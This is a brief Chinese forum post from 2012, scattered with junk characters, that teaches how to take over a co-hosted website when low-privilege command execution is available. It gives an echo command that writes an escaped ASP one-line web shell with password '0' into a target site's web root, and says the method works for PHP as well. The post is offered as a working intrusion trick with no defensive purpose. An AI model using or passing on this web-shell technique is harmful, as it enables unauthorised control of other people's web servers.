在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。) e* t2 R4 i0 [3 Y
0 d: z$ J; A( O7 |
命令格式
* Y: d; C- W9 ~
5 e+ r3 m7 w: C8 M% q& u* U0 oEcho 语句 >目标站绝对目录
; x% s; C; a7 [" h5 M
5 K; g9 h$ p9 }" }' e$ k例如: + A. K8 Z; q1 ]4 s
4 s* R: y9 ~4 F' B2 Oecho ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp+ z* a( t3 C- \8 R. r& F; v6 s
8 h$ S7 I8 S- i5 |& C) A7 M
这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。
0 ]3 z9 j% B7 T8 |0 o [ |
发表于 2012-9-23 14:40:24
收藏
支持
反对